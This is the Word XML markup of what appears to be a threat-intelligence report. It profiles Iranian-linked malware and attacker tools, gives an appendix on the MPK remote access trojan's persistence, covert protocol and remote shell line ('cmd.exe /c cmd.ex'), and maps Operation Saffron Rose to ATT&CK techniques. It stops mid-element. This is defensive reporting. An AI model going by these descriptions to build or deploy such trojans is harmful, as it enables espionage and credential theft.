    <w:p w14:paraId="3EFE33EB" w14:textId="77777777" w:rsidR="00830893" w:rsidRPr="00830893" w:rsidRDefault="00830893" w:rsidP="00830893">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00830893">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>Additionally, we have witnessed many attacks using various ‘web hacking’ tools and suites, in attempt to break into victim web sites.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391A8E18" w14:textId="77777777" w:rsidR="00830893" w:rsidRPr="00830893" w:rsidRDefault="00830893" w:rsidP="00830893">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00830893">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Previously reported custom-malware included: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453E1608" w14:textId="6B134028" w:rsidR="00830893" w:rsidRPr="00830893" w:rsidRDefault="00830893" w:rsidP="00830893">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00830893">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00830893">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>CWoolger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00830893">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>—a C++ based ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00830893">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>woolen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00830893">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> key-logger.’ The malware records all keystrokes and sends out key-log data to a hard-coded FTP server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2536B9F9" w14:textId="304E7D7C" w:rsidR="00830893" w:rsidRPr="00830893" w:rsidRDefault="00830893" w:rsidP="00830893">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00830893">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>• Wrapper/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00830893">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>Gholee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00830893">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>—repurposed Core Impact penetration testing tool. The malware allows a platform for remote access, pivoting for lateral movement and further malware installation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15993A7A" w14:textId="77777777" w:rsidR="00830893" w:rsidRDefault="00830893" w:rsidP="00830893">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00830893">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00830893">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>FireMalv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00830893">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>—a .NET based Firefox credential stealer. This tool copies passwords stored in the Firefox browser storage.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3470AC" w14:textId="4A4008AA" w:rsidR="00830893" w:rsidRPr="00830893" w:rsidRDefault="00830893" w:rsidP="00830893">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00830893">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>Check Point investigations additionally discovered the attackers using the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FADFAD" w14:textId="125D3A8D" w:rsidR="00830893" w:rsidRPr="00830893" w:rsidRDefault="00830893" w:rsidP="0056208A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00830893">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>• .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00830893">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>NETWoolger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00830893">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>—a .NET based ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00830893">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>woolen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00830893">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> key-logger.’ This malware is functionally similar to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00830893">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>CWoolger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00830893">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>. The attackers seem to use them interchangeably, as alternate infection mechanisms (in case one is detected at the victim computer).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55030B28" w14:textId="747BE7DE" w:rsidR="00830893" w:rsidRPr="00830893" w:rsidRDefault="00830893" w:rsidP="0056208A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00830893">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>• MPK—a custom RAT of wider functionality. The malware allows key-logging, as well as remote command execution, screenshot grabbing and traffic monitoring. For a detailed technical description of the MPK malware see Appendix B.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEAF02A" w14:textId="6686DD8D" w:rsidR="00830893" w:rsidRPr="00830893" w:rsidRDefault="00830893" w:rsidP="00830893">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00830893">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>In addition to custom-written malware, we have seen the attackers use various hacking and scanning tools to attack victim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00830893">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>web-sites.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB2BD95" w14:textId="1EA28535" w:rsidR="00830893" w:rsidRPr="00830893" w:rsidRDefault="00830893" w:rsidP="00830893">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00830893">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>• Metasploit—An open-source, extensible penetration testing platform. Metasploit’s ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00830893">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00830893">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>’ payload was wrapped in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00830893">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>an executable file and distributed as a RAT attached to phishing emails by the attackers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771FCE33" w14:textId="77777777" w:rsidR="00830893" w:rsidRPr="00830893" w:rsidRDefault="00830893" w:rsidP="00830893">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00830893">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00830893">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>Havij</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00830893">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00830893">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>SQLMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00830893">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">—SQL injection tools; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00830893">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>Havij</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00830893">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> originates in Iranian development, while </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00830893">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>SQLMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00830893">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00830893">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>open source</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00830893">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34630876" w14:textId="1CFC3910" w:rsidR="00830893" w:rsidRPr="00830893" w:rsidRDefault="00830893" w:rsidP="00830893">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00830893">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00830893">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>Acunetix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00830893">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00830893">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>Netsparker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00830893">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>—off-the-shelf web vulnerability scanners, attempting to automatically discover and exploit vulnerabilities in common web platforms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329492E3" w14:textId="05096CBD" w:rsidR="00830893" w:rsidRPr="00830893" w:rsidRDefault="00830893" w:rsidP="00830893">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00830893">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>• WSO Web Shell—a well-known web shell - PHP script that allows backdoor access on a hacked server. Typically deployed after successful compromise to allow further actions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D3B056" w14:textId="7B84CFC8" w:rsidR="00005982" w:rsidRDefault="00830893" w:rsidP="00B026CD">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00830893">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>• NIM-Shell—a web shell of Iranian hacker group origin with similar functionality. Additionally uses Perl scripts on the hacked server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31241515" w14:textId="50498FFC" w:rsidR="00EF728A" w:rsidRDefault="00EF728A" w:rsidP="00B026CD">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="312589B8" w14:textId="1E4FFF4B" w:rsidR="00EF728A" w:rsidRDefault="00EF728A" w:rsidP="00EF728A">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:r>
        <w:t>APPENDIX B—MPK TECHNICAL DESCRIPTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E019A3D" w14:textId="0A6F5971" w:rsidR="00EF728A" w:rsidRDefault="00EF728A" w:rsidP="00EF728A">
      <w:r>
        <w:t>[1] For persistence, the malware will add itself to autorun under an “explorer” entry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC70A08" w14:textId="0889B23D" w:rsidR="00884836" w:rsidRDefault="00884836" w:rsidP="00EF728A">
      <w:r>
        <w:t>[1] The malware includes a Visual Basic script (‘tmp.vbs’) script, which will try to initially copy the malware executable to its destination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258790B3" w14:textId="0BC31988" w:rsidR="00884836" w:rsidRDefault="00884836" w:rsidP="00EF728A">
      <w:r>
        <w:t>[1] Main operation This malware is basically a RAT (Remote Access Trojan). It implements such functionality as a key-logger, sniffing TCP and UDP traffic, taking screenshots, as well as a remote command shell. Also, it may gather a lot of information about the target system such as enumeration of files, drives, services, process information and the ability to send any file to the C&amp;C server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B71C8B" w14:textId="18D267BF" w:rsidR="00D40E0C" w:rsidRDefault="00D40E0C" w:rsidP="00EF728A">
      <w:r>
        <w:t xml:space="preserve">[1] Communication protocol </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>The</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> malware uses raw sockets over IP protocol (IPPROTO_IP flag), effectively implementing its own protocol for data transfer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE2CDE5" w14:textId="2623AA65" w:rsidR="00F21166" w:rsidRDefault="00F21166" w:rsidP="00EF728A">
      <w:r>
        <w:t>[1] A connection will be established to that IP, while sending periodic ‘keep-alive’ messages, containing these 6 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A4D0B2" w14:textId="4ADC60FA" w:rsidR="00FD768E" w:rsidRDefault="00FD768E" w:rsidP="00FD768E">
      <w:r>
        <w:t>[1] Remote Shell (Live Command Execution) - The malware creates the following process as a live command prompt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414CA67B" w14:textId="61E7117B" w:rsidR="00FD768E" w:rsidRPr="00005982" w:rsidRDefault="00FD768E" w:rsidP="00FD768E">
      <w:r>
        <w:t xml:space="preserve">cmd.exe /c </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>cmd.ex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2D5FEE27" w14:textId="2ED55187" w:rsidR="005B4630" w:rsidRDefault="006F20D8" w:rsidP="005B023E">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc110935500"/>
      <w:bookmarkStart w:id="29" w:name="_Toc153480839"/>
      <w:r>
        <w:t xml:space="preserve">T1566.002 - </w:t>
      </w:r>
      <w:r w:rsidR="005B4630" w:rsidRPr="005B4630">
        <w:t>OPERATION SAFFRON ROSE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="74D2AC5A" w14:textId="77777777" w:rsidR="005B4630" w:rsidRDefault="005B4630" w:rsidP="005B4630">
      <w:r w:rsidRPr="00AA28DB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">T1566.002 Phishing: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA28DB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA28DB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Link</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653C1F45" w14:textId="042227DD" w:rsidR="00F6742A" w:rsidRPr="005B4630" w:rsidRDefault="00691E0D" w:rsidP="005B4630">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidR="00F6742A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Operation Saffron Rose (mandiant.com)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="762FE6EB" w14:textId="02E1DE6F" w:rsidR="00F6742A" w:rsidRPr="00AA28DB" w:rsidRDefault="00AA28DB" w:rsidP="00F6742A">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA28DB">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Targets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6A812A" w14:textId="657B9511" w:rsidR="00AA28DB" w:rsidRDefault="00AA28DB" w:rsidP="00F6742A">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Industrial Base (US)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5112A6A2" w14:textId="16314109" w:rsidR="00AA28DB" w:rsidRDefault="00AA28DB" w:rsidP="00F6742A">
      <w:r>
        <w:t xml:space="preserve">Users of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Anti Censorship</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Tech (Iran)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A98B668" w14:textId="71175408" w:rsidR="00AA28DB" w:rsidRDefault="00AA28DB" w:rsidP="00F6742A">
      <w:r>
        <w:t>P4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2376B8E2" w14:textId="26FF99F7" w:rsidR="00AA28DB" w:rsidRDefault="00AA28DB" w:rsidP="00F6742A">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> – Download malware from fake website </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA28DB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1566.002</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AA28DB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Phishing: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA28DB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA28DB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Link</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680D18F1" w14:textId="77777777" w:rsidR="000D25A0" w:rsidRDefault="000D25A0" w:rsidP="00F6742A">
      <w:r>
        <w:t>P5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C2514D" w14:textId="20E40E80" w:rsidR="00AA28DB" w:rsidRDefault="00AA28DB" w:rsidP="00F6742A">
      <w:r>
        <w:t xml:space="preserve">Credential phishing – Fake website to trick users into entering </w:t>
      </w:r>
      <w:r w:rsidR="000D25A0">
        <w:t xml:space="preserve">(and then capturing) </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">credentials </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="000D25A0" w:rsidRPr="000D25A0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1056.002</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="000D25A0" w:rsidRPr="000D25A0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Input Capture: GUI Input Capture</w:t>
      </w:r>
      <w:r w:rsidR="000D25A0">
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B88B26A" w14:textId="2B029FB2" w:rsidR="00AA28DB" w:rsidRDefault="00601B62" w:rsidP="00F6742A">
      <w:r>
        <w:t xml:space="preserve">P6 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB54B01" w14:textId="72654936" w:rsidR="00601B62" w:rsidRDefault="00601B62" w:rsidP="00F6742A">
      <w:r>
        <w:t>Stealer Malware</w:t>
      </w:r>
      <w:r w:rsidR="000A0FC2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="000A0FC2">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="000A0FC2" w:rsidRPr="000A0FC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1587.001</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="000A0FC2" w:rsidRPr="000A0FC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Develop Capabilities: Malware</w:t>
      </w:r>
      <w:r w:rsidR="000A0FC2">
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA31CAC" w14:textId="226338AE" w:rsidR="00601B62" w:rsidRDefault="00601B62" w:rsidP="002037C9">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
